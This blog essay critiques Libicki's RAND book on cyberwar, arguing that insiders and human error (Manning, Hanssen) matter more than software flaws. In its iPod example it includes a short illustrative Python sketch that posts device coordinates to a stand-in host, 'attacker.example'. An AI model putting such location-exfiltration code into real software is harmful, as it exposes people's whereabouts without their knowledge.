Infiltrated dot Net

Re-analyzing Cyberdeterrence and Cyberwarfare
Written by Jesus Oquendo   

Cyberdeterrence and Cyberwar by Martin C. Libicki of the RAND Corporation [1] was an interesting read, but I noticed it contains many short-sighted descriptions and theories that could lower the defensive and offensive posture of any government, military, or private-sector organization that treats the work as a de facto source to be relied upon. My perspective comes from some of the statements and assumptions the author makes. For example, Libicki states: "Cyberattacks Are Possible Only Because Systems Have Flaws." [1, p. 14] I am unsure whether this statement reflects the knowledge available to the author at the time, or whether it is what the author truly believed, or still believes, today.

A computing system will always have some form of flaw; however, to think that flaws are the only reason an attack can succeed is itself flawed. Rather than get into a long discussion of the successes and failures of computing systems, I would like to point out the obvious: humans are flawed, often more so than the computers and the programs or code running on them. An establishment can create complex mechanisms and rules to secure systems to the Nth degree, yet human error can cause the security of those systems to fail repeatedly.


Nowhere was this more evident than in the cases of Bradley Manning [2] and Robert Hanssen [3, pp. 28–33]. Both men had access to classified and "air gapped" [4] systems. Policies, controls, and deterrents were put in place, yet all of them failed, allowing the two to cause real damage. While one can question whether Manning and Hanssen are relevant to a cyberwarfare discussion, their relevance here stems from the erroneous statement that "Cyberattacks Are Possible Only Because Systems Have Flaws." Moreover, even my own explanation and counterargument are flawed because of my broad interpretation of the word "systems" in that statement; I read it as meaning "information or computing systems."

In the book, the author continues: "Operational Cyberwar Has an Important Niche Role, but Only That. For operational cyberwar—acting against military targets during a war—to work, its targets have to be accessible and have vulnerabilities. These vulnerabilities have to be exploited in ways the attacker finds useful. It also helps if effects can be monitored." [1, p. 15] This is a very narrow assumption and a short-sighted theory. Accessibility need not be defined as accessibility from "the Internet" or accessibility by an enemy. Accessibility by any individual introduces a threat to the system as a whole, whether that individual is an enemy or a trusted insider, as already explained using Manning and Hanssen as examples. While those two may be extreme cases, and the likelihood of a repeat low, humans often cause more damage than buggy code, bad applications, and exploits. An attacker can therefore use the human as the vulnerability, as is often the case in targeted "client side" [5] attacks.

In the sentence "These vulnerabilities have to be exploited in ways the attacker finds useful," the author may not have been cognizant of client-side attacks or may not have fully understood the weight of the risk posed by human error. Almost any attack is useful, and anyone studying cyberwarfare needs to view attacks from a broader range of perspectives. In cyberwarfare, attacks will not depend solely on whether a system (interpreted as a physical computer or piece of software) is vulnerable; an analyst should try to look at all possible conclusions and outcomes that may affect a target. This includes the systems and the operators of those systems, the humans.

Assume that I needed to access a system behind an air-gapped network. Is it safe to assume that, because I have no access to that system, or because that system is not accessible to outside sources, the system is secure? It would be absurd to make such broad statements, especially in light of the information that made its way onto WikiLeaks. The failures of the Manning incident may have come from a lack of oversight, blind trust, and perhaps even a lack of system accounting. At the end of the day, the outcome was much the same as if an outside attacker had accessed the information. The same analysis should apply to the second quote from the book: "acting against military targets during a war—to work, its targets have to be accessible and have vulnerabilities." An attacker need not have accessibility in order to exploit an "individual" who has access to these systems. Sometimes human error is our own worst enemy.

A lack of accounting and auditing can lead to horrific outcomes. Imagine for a moment that soldiers on the battlefield have in their possession something as simple as an iPod. Perhaps the iPod is doing nothing but sitting inside a Hummer. There is the possibility that a rogue application could transmit geolocation data to an enemy, rendering any element of surprise useless. This iPod example demonstrates an exploitable vulnerability even though no buggy code or software exploit is involved. While it would not allow an enemy to shut down, say, a missile system, it is still a vulnerability.
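To illustrate how little is required, here is a minimal sketch in Python. It is purely hypothetical: read_coordinates() is a stand-in for whatever location API a device exposes, the hard-coded coordinates are placeholders, and the collection URL is invented for illustration; no specific device or application is implied.

    import json
    import time
    import urllib.request

    def read_coordinates():
        # Stand-in for a platform location API; returns (latitude, longitude).
        # Hard-coded placeholder values for illustration only.
        return (33.3152, 44.3661)

    def report(url="http://attacker.example/drop"):
        # Package the current position with a timestamp and send it out over
        # plain HTTP, exactly as any innocuous "check-in" feature might.
        lat, lon = read_coordinates()
        payload = json.dumps({"lat": lat, "lon": lon, "ts": time.time()}).encode()
        req = urllib.request.Request(url, data=payload,
                                     headers={"Content-Type": "application/json"})
        urllib.request.urlopen(req, timeout=5)

    if __name__ == "__main__":
        report()

The point is not the code itself but that nothing in it exploits a flaw; the device is simply doing what applications are normally allowed to do.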

Further into the book, the author states: "The United States and, by extension, the U.S. Air Force, should not make strategic cyberwar a priority investment area. Strategic cyberwar, by itself, would annoy but not disarm an adversary." [1, p. 20] While reading, I found this to be another broad statement based on assumption. As explained in the previous paragraph, the possible outcome could be dire, since locations would be exposed. The annoyance and the danger here would be reversed, affecting not the adversary but our own forces.

Military commanders and generals responsible for strategy could spend hours re-analyzing how their locations are constantly being exposed. Money down the drain. Soldiers could even be injured as a result, or worse, lives could be lost. All the while, the vulnerability existed because of something as simple as an iPod or a mobile phone. Furthermore, there is the possibility of disarming an adversary's systems using cyberwarfare. Nowhere was this more evident than in the Stuxnet infection that affected Iran [6] and in the Idaho National Laboratory demonstration that destroyed a generator [7].

Anyhow, I will continue reading the book, as it is an interesting read. Hopefully the thinkers in this field can broaden their scope of cyberwarfare using "outside the box" information.

[1] Libicki, Martin C. Cyberdeterrence and Cyberwar. RAND Corporation. ISBN 978-0-8330-4734-2.
[2] http://en.wikipedia.org/wiki/Bradley_Manning
[3] Wise, David (2003), Spy: The Inside Story of How the FBI's Robert Hanssen Betrayed America
[4] http://en.wikipedia.org/wiki/Air_gap_%28networking%29
[5] http://www.honeynet.org/node/157
[6] http://en.wikipedia.org/wiki/Stuxnet
[7] http://articles.cnn.com/2007-09-26/us/power.at.risk_1_generator-cyber-attack-electric-infrastructure?_s=PM:US